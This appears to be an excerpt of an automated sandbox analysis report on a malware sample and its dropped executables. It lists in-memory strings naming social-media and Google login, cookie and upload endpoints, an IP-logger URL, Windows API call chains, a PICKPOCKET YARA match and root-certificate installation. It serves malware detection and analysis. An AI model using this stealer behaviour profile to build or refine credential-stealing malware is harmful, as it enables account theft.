Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appnuA2
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/B7
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settings
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settings51iB7
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpString found in binary or memory: https://iplogger.org/14Zhe7
Source: 1E1C360C582DF797.exeString found in binary or memory: https://mail.google.com/mail
Source: 1E1C360C582DF797.exeString found in binary or memory: https://mail.google.com/mail/#settings
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settingsox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mailx
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/
Source: 1E1C360C582DF797.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/
Source: 1E1C360C582DF797.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 1E1C360C582DF797.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: h1GodtbhC8.exeString found in binary or memory: https://sectigo.com/CPS0
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drString found in binary or memory: https://sectigo.com/CPS0D
Source: 1E1C360C582DF797.exe, 00000015.00000003.563235849.0000000005D32000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmpZk
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN9
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint7=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messagingP
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641821279.0000000005C56000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc2
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevicesH
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangoutse2/crx
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra/crx0
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E624C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,FindCloseChangeNotification,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text sectionShow sources
Source: aliens.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1E1C360C582DF797.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01217165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004079A2
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004049A8
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406EFE
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_0040737E
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E66CE40
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E66AE3E
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E679FF6
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E67BC5D
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E67FC01
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E67BB3D
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E657714
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6677A0
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E66756E
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E66733C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01218525
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012265B6
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01230146
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121E1E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122702F
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121404E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121326D
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123457A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123055E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01223731
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012347A9
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121E7E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012127D4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012239AC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01230993
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012269EB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121F8A8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01225BE7
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123CA20
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121BD53
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121DDAC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01230DC8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122FC4A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121EC54
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01223CDD
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01215F0C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01240FD4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123CECE
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00403DA8
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00407071
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000C063
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000B883
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100060F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100169BD
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100099E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100071F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10009257
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10010AED
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10008340
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000E380
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000ABA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000B3B0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001EBD0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100083F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000BC57
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000C483
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10010590
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001EDDB
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026EB7CE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E75D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DEAA1
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026F2BB0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E6D04
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E93BFE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E8E58A
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04EA0780
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E8C019
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E83C51
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04EA2F70
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\71eza90awf48\aliens.exe 6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: String function: 04E61320 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: String function: 026E9F94 appears 49 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: String function: 6E627EA0 appears 41 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: String function: 0122E1C0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: String function: 0122E0E4 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: String function: 0122EB60 appears 31 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: String function: 004067A9 appears 58 times
Source: h1GodtbhC8.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSibClr.dll. vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSibuia.dllN vs h1GodtbhC8.exe
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: dxgidebug.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
